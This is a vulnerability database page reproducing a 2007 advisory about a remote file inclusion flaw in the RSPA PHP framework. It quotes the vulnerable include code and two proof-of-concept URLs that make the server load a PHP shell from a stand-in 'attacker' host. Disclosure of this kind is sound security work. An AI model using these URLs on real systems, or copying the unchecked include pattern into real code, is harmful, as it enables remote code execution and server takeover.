Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

rspa-rfi.txt

๐Ÿ—“๏ธย 03 Apr 2007ย 00:00:00Reported byย Hamid EbadiTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 12ย Views

RSPA Remote File Inclusion vulnerability in PHP framewor

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`RSPA Remote File Inclusion  
  
Really Simple PHP and Ajax (RSPA)  
RSPA is a component based event driven ajax enabled framework for PHP4 and PHP 5. It is a combination of plane PHP class and HTML/Javascript.RSPA allows calling server side PHP functions from client javascript events. Visit http://rspa.sourceforge.net  
  
Credit:  
The information has been provided by Hamid Ebadi  
The original article can be found at : http://www.bugtraq.ir  
  
http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6  
  
Vulnerable Systems:  
Version: rspa-2007-03-23  
  
Description:  
Input passed to the" __IncludeFilePHPClass ", " __ClassPath" and " __class" parameters in "rspa/framework/Controller_v5.php" and " rspa/framework/Controller_v4.php " is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.  
  
  
read more about file inclusion in http://www.bugtraq.ir/articles  
  
Vulnerable Code :  
require_once("rspaconf.inc.php");  
  
$className = $_REQUEST['__class'];  
$methordName = $_REQUEST['__methord'];  
  
// IncludeFile for PHP Class  
if ($_REQUEST['__IncludeFilePHPClass']){  
$filename = $_REQUEST['__IncludeFilePHPClass'];  
require_once ($filename);  
}  
  
// Parms  
if (isset($_REQUEST['__parameters'])){$parameter = getParms($_REQUEST['__parameters']);}else{$parameter="";}  
  
// ClassFile + ClassPath  
include ("../components/Form.class.php");  
if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath"])){  
$filename = $RSPA['class_folder'].$className.$RSPA['class_extension'];  
}else{  
$filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension'];  
}  
require_once($filename);  
  
  
  
POC exploit :  
The following URL will cause remote file inclusion  
  
http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://attacker/phpshell.txt/?  
http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt/?  
  
[ http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6 ]  
  
# copyright : http://www.bugtraq.ir`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Apr 2007 00:00Current
remote file inclusionrspa frameworkphp security
12
.json
Report